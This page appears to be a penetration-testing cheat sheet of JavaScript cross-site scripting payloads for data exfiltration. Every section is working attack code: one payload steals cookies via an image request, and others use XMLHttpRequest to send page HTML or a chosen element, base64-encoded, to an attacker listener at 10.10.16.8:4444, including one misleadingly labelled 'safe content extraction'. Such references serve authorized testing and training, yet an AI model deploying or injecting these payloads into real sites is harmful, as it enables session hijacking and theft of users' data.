Data Exfiltration

Javascript Payloads

Creates an image object to trigger a GET request with stolen cookies

x = new Image(); x.src ='[HOST]?data='+btoa(document.cookie);

XMLHttpRequest Exfiltration

Steals entire page HTML and sends to attacker

var req=new XMLHttpRequest();
req.open('GET', 'http://10.10.16.8:4444/?tokyo=' + btoa(document.body.innerHTML), true);
req.send();

Two-Stage Exfiltration

First request: Extract specific page element (#admin)
Second request: Send that data to attacker

Extract specific page elements

function getElement() {
	var req1=new XMLHttpRequest(); 
	req1.open('GET', '#admin' , true); //Swap #admin for your desired element
	req1.onreadystatechange = function () { 
		if (req1.readyState === req1.DONE) {
			if (req1.status === 200) { 
				 var req2=new XMLHttpRequest(); 
				req2.open('GET', 'http://10.10.16.8:4444?tokyo=' + btoa(req1.responseText), true);
				req2.send(); 
				}
			}
		}; 
	req1.send();
}

getElement();

Safe Content Extraction with Encoding

Safe content extraction with encoding

function safeContentGrab() {
    var req = new XMLHttpRequest();
    req.open('GET', 'http://example.com', true);
    req.onload = function() {
        if (req.status === 200) {
            var encodedData = btoa(req.responseText);
            console.log('Encoded:', encodedData);
             var sendReq = new XMLHttpRequest();
             sendReq.open('POST', 'http://10.10.16.8:4444/', true);
             sendReq.send('tokyo=' + encodedData);
        }
    };
    req.send();
}

function cookieExample() {
    document.cookie = "testCookie=exampleValue; SameSite=Lax";
    var allCookies = document.cookie;
    console.log('All cookies:', allCookies);
}

safeContentGrab();
cookieExample();

Last updated 1 month ago